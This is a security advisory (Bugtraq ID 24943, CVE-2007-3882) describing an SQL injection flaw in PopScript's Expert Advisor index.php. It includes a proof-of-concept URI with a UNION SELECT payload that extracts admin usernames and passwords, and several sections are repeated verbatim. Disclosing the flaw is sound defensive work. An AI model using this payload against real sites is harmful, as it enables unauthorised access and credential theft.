Expert Advisor Index.PHP SQL Injection Vulnerability
BID:24943
Info
Expert Advisor Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 24943 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3882 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 17 2007 12:00AM |
| Updated: | May 07 2015 05:36PM |
| Credit: | t0pP8uZz & xprog are credited with the discovery of this vulnerability. |
| Vulnerable: |
PopScript.com Expert Advisor 0 |
| Not Vulnerable: | |
Discussion
Expert Advisor Index.PHP SQL Injection Vulnerability
Expert Advisor is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The affected version of the software wasn't reported. We will update this BID when more information emerges.
Expert Advisor is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The affected version of the software wasn't reported. We will update this BID when more information emerges.
Exploit / POC
Expert Advisor Index.PHP SQL Injection Vulnerability
The following is a proof-of-concept URI that demonstrates this issue:
http://www.example.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
The following is a proof-of-concept URI that demonstrates this issue:
http://www.example.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
Solution / Fix
Expert Advisor Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Expert Advisor Index.PHP SQL Injection Vulnerability
References:
References:
- Expert Advisor Homepage (PopScript.com)